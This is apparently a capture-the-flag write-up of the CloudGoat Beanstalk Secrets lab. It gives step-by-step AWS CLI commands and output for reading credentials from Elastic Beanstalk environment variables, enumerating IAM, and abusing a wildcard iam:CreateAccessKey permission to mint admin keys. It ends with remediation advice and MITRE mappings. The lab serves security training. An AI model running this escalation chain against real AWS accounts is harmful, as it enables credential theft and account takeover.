🥷 CloudGoat: Beanstalk Secrets (AWS CLI): Write-up: From low-privilege user to admin (AWS CLI approach)

🥷 CloudGoat: Beanstalk Secrets (AWS CLI)

Write-up: From low-privilege user to admin (AWS CLI approach)

🧭 Overview

Scenario: beanstalk_secrets \
Platform: CloudGoat (Rhino Security Labs) \
Tools: AWS CLI (no exploitation frameworks) \
Objective: Extract secrets from Elastic Beanstalk, escalate to admin, and retrieve the flag.

⚔️ Attack Path Summary

Low-Priv User → Beanstalk Enum → Secondary Creds → IAM Enum → CreateAccessKey → Admin → Flag

🔑 Phase 1: Initial Access

Configure Low-Privilege Profile

aws configure --profile ebs-1
# Access Key: AKIA****************
# Secret Key: EOyTyXYE/DwNCFAHmFSla5SWz**************

Validate Credentials

aws sts get-caller-identity --profile ebs-1

{
  "UserId": "AIDA****************",
  "Account": "7912********",
  "Arn": "arn:aws:iam::7912********:user/cgid09kivyz0ga_low_priv_user"
}

🔎 Phase 2: Elastic Beanstalk Enumeration

List Applications

aws elasticbeanstalk describe-applications --profile ebs-1

Found: cgid09kivyz0ga-app - "Elastic Beanstalk application for insecure secrets scenario"

List Environments

aws elasticbeanstalk describe-environments --profile ebs-1

Property	Value
Environment	cgid09kivyz0ga-env
Application	cgid09kivyz0ga-app
Platform	Python 3.11 on Amazon Linux 2023
Status	Ready

Extract Configuration Settings

aws elasticbeanstalk describe-configuration-settings \
  --application-name cgid09kivyz0ga-app \
  --environment-name cgid09kivyz0ga-env \
  --query "ConfigurationSettings[0].OptionSettings[?Namespace=='aws:elasticbeanstalk:application:environment']" \
  --output table \
  --profile ebs-1

Namespace	Name	Value
aws:elasticbeanstalk:application:environment	PYTHONPATH	/var/app/venv/staging-LQM1lest/bin
aws:elasticbeanstalk:application:environment	SECONDARY_ACCESS_KEY	AKIA****************
aws:elasticbeanstalk:application:environment	SECONDARY_SECRET_KEY	19jM1vKF4UQqw8vJo6FwKKxd**************

Credentials extracted from environment variables.

👤 Phase 3: Pivot to Secondary User

Configure Secondary Profile

aws configure --profile ebs-2
# Access Key: AKIA****************
# Secret Key: 19jM1vKF4UQqw8vJo6FwKKxd**************

Validate Credentials

aws sts get-caller-identity --profile ebs-2

Confirmed: cgid09kivyz0ga_secondary_user

🗄️ Phase 4: IAM Enumeration

Enumeration Workflow

list-users → list-attached-user-policies → get-policy → get-policy-version

List All Users

aws iam list-users --profile ebs-2

Username	Note
cgid09kivyz0ga_admin_user	Target
cgid09kivyz0ga_low_priv_user	Initial access
cgid09kivyz0ga_secondary_user	Current user

Enumerate Secondary User's Policies

aws iam list-attached-user-policies \
  --user-name cgid09kivyz0ga_secondary_user \
  --profile ebs-2

{
  "AttachedPolicies": [
    {
      "PolicyName": "cgid09kivyz0ga_secondary_policy",
      "PolicyArn": "arn:aws:iam::7912********:policy/cgid09kivyz0ga_secondary_policy"
    }
  ]
}

Get Policy Details

aws iam get-policy \
  --policy-arn arn:aws:iam::7912********:policy/cgid09kivyz0ga_secondary_policy \
  --profile ebs-2

Noted DefaultVersionId: v1

Extract Policy Document

aws iam get-policy-version \
  --policy-arn arn:aws:iam::7912********:policy/cgid09kivyz0ga_secondary_policy \
  --version-id v1 \
  --profile ebs-2

{
  "Statement": [
    {
      "Action": [
        "iam:CreateAccessKey"
      ],
      "Effect": "Allow",
      "Resource": "*"
    },
    {
      "Action": [
        "iam:ListRoles",
        "iam:GetRole",
        "iam:ListPolicies",
        "iam:GetPolicy",
        "iam:ListPolicyVersions",
        "iam:GetPolicyVersion",
        "iam:ListUsers",
        "iam:GetUser",
        "iam:ListGroups",
        "iam:GetGroup",
        "iam:ListAttachedUserPolicies",
        "iam:ListAttachedRolePolicies",
        "iam:GetRolePolicy"
      ],
      "Effect": "Allow",
      "Resource": "*"
    }
  ]
}

Critical Finding

Permission	Resource	Impact
iam:CreateAccessKey	* (wildcard)	Can create access keys for ANY user, including admin

💥 Phase 5: Privilege Escalation

Create Access Key for Admin User

aws iam create-access-key \
  --user-name cgid09kivyz0ga_admin_user \
  --profile ebs-2

{
  "AccessKey": {
    "UserName": "cgid09kivyz0ga_admin_user",
    "AccessKeyId": "AKIA****************",
    "Status": "Active",
    "SecretAccessKey": "C8aC3UMs1rMewHHLwAHxxk4T**************"
  }
}

Configure Admin Profile

aws configure --profile admin
aws sts get-caller-identity --profile admin

{
  "UserId": "AIDA****************",
  "Account": "7912********",
  "Arn": "arn:aws:iam::7912********:user/cgid09kivyz0ga_admin_user"
}

Privilege escalation successful.

🚩 Phase 6: Capture the Flag

List Secrets

aws secretsmanager list-secrets --profile admin --region us-east-1

Found: cgid09kivyz0ga_final_flag

Retrieve Flag

aws secretsmanager get-secret-value \
  --secret-id cgid09kivyz0ga_final_flag \
  --profile admin \
  --region us-east-1

FLAG{D0nt_st0r3_s3cr3ts_in_b3@nsta1k!}

📐 Attack Chain Diagram

┌─────────────────────┐
│   Low-Priv User     │
│   (ebs-1 profile)   │
└──────────┬──────────┘
           │ elasticbeanstalk:DescribeConfigurationSettings
           ▼
┌─────────────────────┐
│  Beanstalk Secrets  │
│  - Access Key       │
│  - Secret Key       │
└──────────┬──────────┘
           │
           ▼
┌─────────────────────┐
│  Secondary User     │
│   (ebs-2 profile)   │
└──────────┬──────────┘
           │ iam:CreateAccessKey (Resource: *)
           ▼
┌─────────────────────┐
│    Admin User       │
│  (admin profile)    │
└──────────┬──────────┘
           │ secretsmanager:GetSecretValue
           ▼
┌─────────────────────┐
│       FLAG          │
└─────────────────────┘

🚨 Vulnerabilities Exploited

#	Vulnerability	CWE
1	Hardcoded credentials in Beanstalk environment variables	CWE-798
2	Overly permissive IAM policy (iam:CreateAccessKey on *)	CWE-732
3	Lack of least privilege principle	CWE-250

💡 Remediation

1. Do not store long-lived AWS credentials in environment variables - Use AWS Secrets Manager or SSM Parameter Store
2. Restrict iam:CreateAccessKey - Scope to self only:

    {
      "Effect": "Allow",
      "Action": "iam:CreateAccessKey",
      "Resource": "arn:aws:iam::*:user/${aws:username}"
    }

1. Enable CloudTrail alerts for CreateAccessKey API calls
2. Regular IAM Access Analyzer scans to detect overly permissive policies

🎯 MITRE ATT&CK Mapping

Tactic	Technique	ID
Credential Access	Unsecured Credentials: Credentials in Files / Environment Variables	T1552.001
Discovery	Cloud Service Discovery	T1526
Privilege Escalation	Valid Accounts: Cloud Accounts	T1078.004
Persistence	Account Manipulation: Additional Cloud Credentials	T1098.001

🛠️ Commands Reference

# Beanstalk Enumeration
aws elasticbeanstalk describe-applications
aws elasticbeanstalk describe-environments
aws elasticbeanstalk describe-configuration-settings --application-name X --environment-name Y

# IAM Enumeration Workflow
aws iam list-users
aws iam list-attached-user-policies --user-name X
aws iam list-user-policies --user-name X
aws iam get-policy --policy-arn X
aws iam get-policy-version --policy-arn X --version-id vN

# Privilege Escalation
aws iam create-access-key --user-name X

# Secrets Manager
aws secretsmanager list-secrets
aws secretsmanager get-secret-value --secret-id X

You can also read this post on my portfolio page.